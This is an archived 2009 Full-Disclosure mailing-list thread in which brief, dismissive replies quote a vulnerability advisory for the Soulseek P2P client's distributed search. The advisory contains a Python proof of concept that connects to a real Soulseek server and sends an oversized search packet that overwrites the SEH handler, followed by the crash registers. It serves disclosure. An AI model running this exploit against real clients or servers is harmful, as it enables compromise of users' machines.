lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Mon, 8 Jun 2009 15:01:30 +0200
From: "Anders Klixbull" <akl@...erian.dk>
To: "Pete Licoln" <pete.licoln@...il.com>,
	"laurent gaffie" <laurent.gaffie@...il.com>,
	"full-disclosure" <full-disclosure@...ts.grok.org.uk>
Subject: Re: Soulseek * P2P Remote Distributed Search
	CodeExecution

go suck a lemon

________________________________

From: full-disclosure-bounces@...ts.grok.org.uk [mailto:full-disclosure-bounces@...ts.grok.org.uk] On Behalf Of Pete Licoln
Sent: 5. juni 2009 08:02
To: laurent gaffie; full-disclosure
Subject: Re: [Full-disclosure] Soulseek * P2P Remote Distributed Search CodeExecution


Seems like you have a problem with responsible disclosure Kid ;
Do you have any familly relationship with jeremy Brown ? ;P

http://g-laurent.blogspot.com/2009/05/soulseek-p2p-remote-distributed-search.html#comments


2009/5/25 Pete Licoln <pete.licoln@...il.com>


	Oh so you have a blog ...
	http://g-laurent.blogspot.com/
	

	2009/5/25 laurent gaffie <laurent.gaffie@...il.com>
	

		=============================================
		- Release date: May 24th, 2009
		- Discovered by: Laurent GaffiƩ
		- Severity: critical
		=============================================
		
		I. VULNERABILITY
		-------------------------
		Soulseek 157 NS * & 156.* Remote Distributed Search Code Execution
		
		II. BACKGROUND
		-------------------------
		"Soulseek(tm) is a unique ad-free, spyware free, and just plain free file 
		sharing application.
		One of the things that makes Soulseek(tm) unique is our community and 
		community-related features.
		Based on peer-to-peer technology, virtual rooms allow you to meet people with
		the same interests, share information, and chat freely using real-time messages
		in public or private.
		Soulseek(tm), with its built-in people matching system, is a great way to make 
		new friends and expand your mind!"
		
		III. DESCRIPTION
		-------------------------
		Soulseek client allows distributed file search to one person, everyone, or in a 
		specific Soulseek IRC channel, allowing a user to find the files he wants, in 
		a dedicated channel, or with his contacts, or on the whole network.
		Unfortunatly this feature is vulnerable to a remote SEH overwrite to a specific
		user, or even to a whole Soulseek IRC channel.
		
		IV. PROOF OF CONCEPT
		-------------------------
		This proof of concept is made to prevent a S-K party, it is only build to 
		target the user "testt4321".
		
		To try this proof of concept, you would have to open a soulseek client and use
		the username:
		"testt4321"
		with the password:
		"12345678"
		And launch this code.
		If you want to change the username or target a whole channel, you would have 
		to reverse the binary protocol
		
		
		
		#!/usr/bin/python
		import struct
		import sys, socket 
		from time import *
		
		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		s.connect(("208.76.170.50",2242))  # Change to Port 2240 for 156* branch
		
		buffer = "\x48\x00\x00\x00\x01\x00\x00\x00\x08\x00\x00\x00\x74\x65\x73\x74"
		buffer+= "\x34\x33\x32\x31\x08\x00\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38"
		buffer+= "\xb5\x00\x00\x00\x20\x00\x00\x00\x38\x65\x39\x31\x66\x37\x33\x30"
		buffer+= "\x35\x35\x37\x31\x32\x35\x64\x37\x34\x39\x32\x34\x62\x64\x66\x35"
		buffer+= "\x63\x32\x39\x61\x36\x37\x64\x61\x01\x00\x00\x00"
		
		s.send(buffer)
		sleep(1) 
		
		junk = "\x41" * 3084
		next_seh = struct.pack('<L', 0x42424242)
		seh =      struct.pack('<L', 0x43434343)
		other_junk = "\x61" * 1423
		
		buffer2 = "\x01\x0f\x00\x00\x2a\x00\x00\x00\x09\x00\x00\x00\x74\x65\x73\x74"
		buffer2+= "\x74\x34\x33\x32\x31\xa4\x5a\x51\x44\xe8\x0e\x00\x00"+junk+next_seh+seh+other_junk
		s.send(buffer2)
		sleep(1)
		s.recv(1024)
		
		
		
		After the query is send, the memory will look like this
		0012FBE4   41414141
		0012FBE8   42424242  Pointer to next SEH record
		0012FBEC   43434343  SE handler
		0012FBF0   61616161
		
		And the program will terminate with this structure:
		EAX 00000000
		ECX 43434343
		EDX 7C9132BC ntdll.7C9132BC
		EBX 00000000
		ESP 0012EA78
		EBP 0012EA98
		ESI 00000000
		EDI 00000000
		EIP 43434343
		
		
		V. BUSINESS IMPACT
		-------------------------
		An attacker could exploit this vulnerability to compromise any Soulseek client connected to
		the Soulseek network.
		
		VI. SYSTEMS AFFECTED
		-------------------------
		Windows all versions running Soulseek *
		
		VII. SOLUTION
		-------------------------
		A fast solution would be to use Nicotine-Plus (http://nicotine-plus.sourceforge.net/) 
		a Python Soulseek client.
		Another quick workaround (at server level) would be to limit the search query lenght.
		
		VIII. REFERENCES
		-------------------------
		http://www.slsknet.org <http://www.slsknet.org/> 
		
		IX. CREDITS
		-------------------------
		This vulnerability has been discovered by Laurent GaffiƩ
		Laurent.gaffie{remove-this}(at)gmail.com <http://gmail.com/> 
		
		
		X. REVISION HISTORY
		-------------------------
		May 24, 2009: Initial release
		
		
		XI. DISCLOSURE TIMELINE
		-------------------------
		july      29, 2008: Bug discovered
		September 03, 2008: Vendor contacted; no response.
		October   14, 2008: Vendor contacted; still no response.
		April     12, 2009: Idefense contacted.
		April     13, 2009: Idefense answered.
		April     23, 2009: Advisory send to idefense contributor program.
		May       13, 2009: Idefense contacted, bug rejected (no reason given)
		May       15, 2009: Idefense recontacted; no answer.
		May       16, 2009: Last try to contact Soulseek maintainers
		May       24, 2009: Advisory published.
		
		XII. LEGAL NOTICES
		-------------------------
		The information contained within this advisory is supplied "as-is"
		with no warranties or guarantees of fitness of use or otherwise.
		I accept no responsibility for any damage caused by the use or 
		misuse of this information.
		
		
		_______________________________________________
		Full-Disclosure - We believe in it.
		Charter: http://lists.grok.org.uk/full-disclosure-charter.html
		Hosted and sponsored by Secunia - http://secunia.com/
		




Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ